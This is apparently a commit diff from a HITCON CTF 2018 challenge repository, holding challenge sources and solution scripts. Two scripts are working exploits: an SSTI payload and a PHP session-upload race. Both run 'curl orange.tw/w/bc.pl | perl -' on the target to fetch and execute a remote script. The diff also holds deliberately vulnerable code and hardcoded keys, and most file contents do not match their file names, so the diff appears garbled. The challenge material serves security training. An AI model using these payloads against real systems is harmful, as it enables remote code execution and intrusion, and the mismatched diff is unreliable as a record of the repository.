add 2018

Author: orangetw

README.md

@@ -86,7 +86,8 @@ P.S. This is a default installation PHP7.2 + Apache on Ubuntu 18.04
 
 #### Write Ups
 
-* TBD
+* [(English)One Line PHP Challenge](https://hackmd.io/s/B1A2JIjjm)  
+* [(中文)One Line PHP Challenge](https://hackmd.io/s/SkxOwAqiQ)  
 
 
 ## **Baby Cake**
@@ -119,7 +120,7 @@ http://13.230.134.135/
 
 #### Write Ups
 
-* TBD
+* [Baby Cake](https://github.com/PDKT-Team/ctf/tree/master/hitcon2018/baby-cake)  
 
 ## **Oh My Raddit**
 

hitcon-ctf-2018/baby-cake/baby_cake.tgz

@@ -0,0 +1,15 @@
+import requests
+import urlparse
+from Crypto.Cipher import DES
+
+KEY = 'megnnaro'
+def encrypt(s):
+    length = DES.block_size - (len(s) % DES.block_size)
+    s = s + chr(length)*length
+
+    cipher = DES.new(KEY, DES.MODE_ECB)
+    return cipher.encrypt(s).encode('hex')
+
+payload = encrypt("m=p&l=${[].__class__.__base__.__subclasses__()[59]()._module.__builtins__['__import__']('os').popen('curl orange.tw/w/bc.pl | perl -').read()}") 
+r = requests.get('http://13.115.255.46/?s=' + payload)
+print r.content

hitcon-ctf-2018/baby-cake/exploit.phar

@@ -0,0 +1,101 @@
+# coding: UTF-8
+import os
+import web
+import urllib
+import urlparse
+from Crypto.Cipher import DES
+
+web.config.debug = False
+ENCRPYTION_KEY = 'megnnaro'
+
+
+urls = (
+    '/', 'index'
+)
+app = web.application(urls, globals())
+db = web.database(dbn='sqlite', db='db.db')
+
+
+def encrypt(s):
+    length = DES.block_size - (len(s) % DES.block_size)
+    s = s + chr(length)*length
+
+    cipher = DES.new(ENCRPYTION_KEY, DES.MODE_ECB)
+    return cipher.encrypt(s).encode('hex')
+
+def decrypt(s):
+    try:
+        data = s.decode('hex')
+        cipher = DES.new(ENCRPYTION_KEY, DES.MODE_ECB)
+
+        data = cipher.decrypt(data)
+        data = data[:-ord(data[-1])]
+        return dict(urlparse.parse_qsl(data))
+    except Exception as e:
+        print e.message
+        return {}
+
+def get_posts(limit=None):
+    records = []
+    for i in db.select('posts', limit=limit, order='ups desc'):
+        tmp = {
+            'm': 'r', 
+            't': i.title.encode('utf-8', 'ignore'), 
+            'u': i.id, 
+        } 
+        tmp['param'] = encrypt(urllib.urlencode(tmp))
+        tmp['ups'] = i.ups
+        if i.file:
+            tmp['file'] = encrypt(urllib.urlencode({'m': 'd', 'f': i.file}))
+        else:
+            tmp['file'] = ''
+        
+        records.append( tmp )
+    return records
+
+def get_urls():
+    urls = []
+    for i in [10, 100, 1000]:
+        data = {
+            'm': 'p', 
+            'l': i
+        }
+        urls.append( encrypt(urllib.urlencode(data)) )
+    return urls
+
+class index:
+    def GET(self):
+        s = web.input().get('s')
+        if not s:
+            return web.template.frender('templates/index.html')(get_posts(), get_urls())
+        else:
+            s = decrypt(s)
+            method = s.get('m', '')
+            if method and method not in list('rdp'):
+                return 'param error'
+            if method == 'r':
+                uid = s.get('u')
+                record = db.select('posts', where='id=$id', vars={'id': uid}).first()
+                if record:
+                    raise web.seeother(record.url)
+                else:
+                    return 'not found'
+            elif method == 'd':
+                file = s.get('f')
+                if not os.path.exists(file):
+                    return 'not found'
+                name = os.path.basename(file)
+                web.header('Content-Disposition', 'attachment; filename=%s' % name)
+                web.header('Content-Type', 'application/pdf')
+                with open(file, 'rb') as fp:
+                    data = fp.read()
+                return data
+            elif method == 'p':
+                limit = s.get('l')
+                return web.template.frender('templates/index.html')(get_posts(limit), get_urls())
+            else:
+                return web.template.frender('templates/index.html')(get_posts(), get_urls())
+
+
+if __name__ == "__main__":
+    app.run()

hitcon-ctf-2018/oh-my-raddit/exp.py

@@ -0,0 +1,2 @@
+pycrypto==2.6.1
+web.py==0.38

hitcon-ctf-2018/oh-my-raddit/src/app.py

@@ -0,0 +1 @@
+assert ENCRYPTION_KEY.islower()

hitcon-ctf-2018/oh-my-raddit/src/db.db

@@ -0,0 +1,69 @@
+$def with (records, urls)
+<!DOCTYPE html>
+<html>
+<head>
+  <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
+    <meta name="viewport" content="width=device-width, initial-scale=1.0">
+    <title>
+        On my Raddit
+    </title>
+
+    <link href="/static/bootstrap.min.css" rel="stylesheet">
+    <style>
+        body {
+            font-family: "Josefin Sans","Helvetica Neue",Helvetica,Arial,sans-serif;
+        }
+    </style>
+    <script type="text/javascript">
+        function change(t){
+            var limit = t.value
+            if (limit == 10) {
+                location.href = '?s=$urls[0]';
+            } else if (limit == 100) {
+                location.href = '?s=$urls[1]';
+            } else {
+                location.href = '/';
+            }
+        }
+
+    </script>
+</head>
+<body>
+  <div class="container">
+    <div class="jumbotron" style='background: #f7f7f7'>
+        <h1>On my Raddit</h1>
+        <p>Flag is <b>hitcon{ENCRYPTION_KEY}</b>, and here is a <b><a href='static/hint.py'>hint</a></b> for you :P</p>
+        <p><i>P.S. If you fail in submitting the flag and want to argue with author, read the source first!</i></p>
+        <br />
+        <p>
+            Totoal: ${len(records)} &nbsp;
+            <select onchange='change(this)'>
+              <option value="10">10</option>
+              <option value="100">100</option>
+              <option value="All" selected>All</option>
+            </select>
+        </p> 
+        <table class="table">
+          <thead>
+            <tr>
+              <th scope="col">Ups</th>
+              <th scope="col">Title</th>
+              <th scope="col">File</th>
+            </tr>
+          </thead>
+          <tbody>
+            $for r in records:
+                <tr>
+                  <td>$r['ups']</td>
+                  <td><a href="?s=$r['param']">$r['t']</a></td>
+                  $if r['file'] :
+                    <td><a href="?s=$r['file']">down</a></td>
+                  $else:
+                    <td></td>
+                </tr>
+          </tbody>
+        </table>
+    </div>
+  </div>
+</body>
+</html>

hitcon-ctf-2018/oh-my-raddit/src/requirements.txt

@@ -0,0 +1,58 @@
+import sys
+import string
+import requests
+from base64 import b64encode
+from random import sample, randint
+from multiprocessing.dummy import Pool as ThreadPool
+
+
+
+HOST = 'http://54.250.246.238/'
+sess_name = 'iamorange'
+
+headers = {
+    'Connection': 'close', 
+    'Cookie': 'PHPSESSID=' + sess_name
+}
+
+payload = '@<?php `curl orange.tw/w/bc.pl|perl -`;?>'
+
+
+while 1:
+    junk = ''.join(sample(string.ascii_letters, randint(8, 16)))
+    x = b64encode(payload + junk)
+    xx = b64encode(b64encode(payload + junk))
+    xxx = b64encode(b64encode(b64encode(payload + junk)))
+    if '=' not in x and '=' not in xx and '=' not in xxx:
+        print payload
+        break
+
+def runner1(i):
+    data = {
+        'PHP_SESSION_UPLOAD_PROGRESS': 'ZZ' + payload + 'Z'
+    }
+    while 1:
+        fp = open('/etc/passwd', 'rb')
+        r = requests.post(HOST, files={'f': fp}, data=data, headers=headers)
+        fp.close()
+
+def runner2(i):
+    filename = '/var/lib/php/sessions/sess_' + sess_name
+    filename = 'php://filter/convert.base64-decode|convert.base64-decode|convert.base64-decode/resource=%s' % filename
+    # print filename
+    while 1:
+        url = '%s?orange=%s' % (HOST, filename)
+        r = requests.get(url, headers=headers)
+        c = r.content
+        if c and 'orange' not in c:
+            print [c]
+
+
+if sys.argv[1] == '1':
+    runner = runner1
+else:
+    runner = runner2
+
+pool = ThreadPool(32)
+result = pool.map_async( runner, range(32) ).get(0xffff)
+

hitcon-ctf-2018/oh-my-raddit/src/static/bootstrap.min.css

@@ -0,0 +1,2 @@
+<?php
+  ($_=@$_GET['orange']) && @substr(file($_)[0],0,6) === '@<?php' ? include($_) : highlight_file(__FILE__);

hitcon-ctf-2018/oh-my-raddit/src/static/hint.py

@@ -0,0 +1,66 @@
+<%@ Page Language="C#" %>
+<script runat="server">
+    protected void Button1_Click(object sender, EventArgs e) {
+        if (FileUpload1.HasFile) {
+            try {
+                System.Web.HttpContext context = System.Web.HttpContext.Current;
+                String filename = FileUpload1.FileName;
+                String extension = System.IO.Path.GetExtension(filename).ToLower();
+                String[] blacklists = {".aspx", ".config", ".ashx", ".asmx", ".aspq", ".axd", ".cshtm", ".cshtml", ".rem", ".soap", ".vbhtm", ".vbhtml", ".asa", ".asp", ".cer"};
+                if (blacklists.Any(extension.Contains)) {
+                    Label1.Text = "What do you do?";
+                } else {
+                    String ip = context.Request.ServerVariables["REMOTE_ADDR"];
+                    String upload_base = Server.MapPath("/") + "files/" + ip + "/";
+                    if (!System.IO.Directory.Exists(upload_base)) {
+                        System.IO.Directory.CreateDirectory(upload_base);
+                    }
+
+                    filename = Guid.NewGuid() + extension;
+                    FileUpload1.SaveAs(upload_base + filename);
+
+                    Label1.Text = String.Format("<a href='files/{0}/{1}'>This is file</a>", ip, filename);
+                }
+            }
+            catch (Exception ex)
+            {
+                Label1.Text = "ERROR: " + ex.Message.ToString();
+            }
+        } else {
+            Label1.Text = "You have not specified a file.";
+        }
+    }
+</script>
+
+<!DOCTYPE html>
+<html>
+<head runat="server">
+    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
+    <link rel="stylesheet" type="text/css" href="bootstrap.min.css">
+    <title>Why so Serials?</title>
+</head>
+<body>
+  <div class="container">
+    <div class="jumbotron" style='background: #f7f7f7'>
+        <h1>Why so Serials?</h1>
+        <p>May the <b><a href='Default.aspx.txt'>source</a></b> be with you!</p>
+        <br />
+        <form id="form1" runat="server">
+            <div class="input-group">
+                <asp:FileUpload ID="FileUpload1" runat="server" class="form-control"/>
+                <span class="input-group-btn">
+                    <asp:Button ID="Button1" runat="server" OnClick="Button1_Click" 
+                 Text="GO" class="btn"/>
+                </span>
+            </div>
+            <br />
+            <br />
+            <br />
+            <div class="alert alert-primary text-center">
+                <asp:Label ID="Label1" runat="server"></asp:Label>
+            </div>
+        </form>
+    </div>
+  </div>
+</body>
+</html>

hitcon-ctf-2018/oh-my-raddit/src/templates/index.html

@@ -0,0 +1,7 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<configuration>
+<system.web>
+<customErrors mode="Off"/>
+    <machineKey validationKey="b07b0f97365416288cf0247cffdf135d25f6be87" decryptionKey="6f5f8bd0152af0168417716c0ccb8320e93d0133e9d06a0bb91bf87ee9d69dc3" decryption="DES" validation="MD5" />
+</system.web>
+</configuration>